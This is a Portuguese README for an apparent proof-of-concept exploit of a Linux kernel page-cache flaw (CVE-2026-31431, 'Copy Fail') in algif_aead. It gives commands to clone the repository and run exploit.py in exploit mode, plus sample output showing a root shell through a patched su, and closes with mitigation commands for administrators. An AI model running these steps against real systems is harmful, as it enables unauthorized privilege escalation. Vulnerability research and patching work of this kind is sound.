
CVE-2026-31431 - Vulnerabilidade no Page Cache do Linux Kernel
Este projeto é fornecido estritamente para:
O autor e os colaboradores NÃO são responsáveis por uso indevido, danos, perda de dados, interrupção de serviços ou quaisquer atividades ilegais realizadas com este software.
Ferramenta de pesquisa do tipo prova de conceito para CVE-2026-31431, também conhecida como "Copy Fail", uma vulnerabilidade do kernel Linux que afeta a implementação AEAD algif_aead / authencesn.
A vulnerabilidade pode permitir a corrupção do cache de páginas (page cache) sob condições específicas, potencialmente levando à escalada local de privilégios em sistemas vulneráveis.
Clone o repositório:
git clone https://github.com/Lutfifakee-Project/CVE-2026-31431.git
cd CVE-2026-31431
python3 exploit.py
python3 exploit.py --exploit
Quando solicitado:
Type 'YES' to continue
python3 exploit.py --cleanup
python3 exploit.py --help
$ python3 exploit.py --exploit
[!] DANGER ZONE: Exploit mode
Type 'YES' to continue: YES
[*] CVE-2026-31431 Copy Fail Exploit
[+] Page cache patching complete!
[+] Executing modified su...
# id
uid=0(root) gid=1001(user)
Se você é administrador de sistemas e precisa mitigar a exposição:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo rmmod algif_aead 2>/dev/null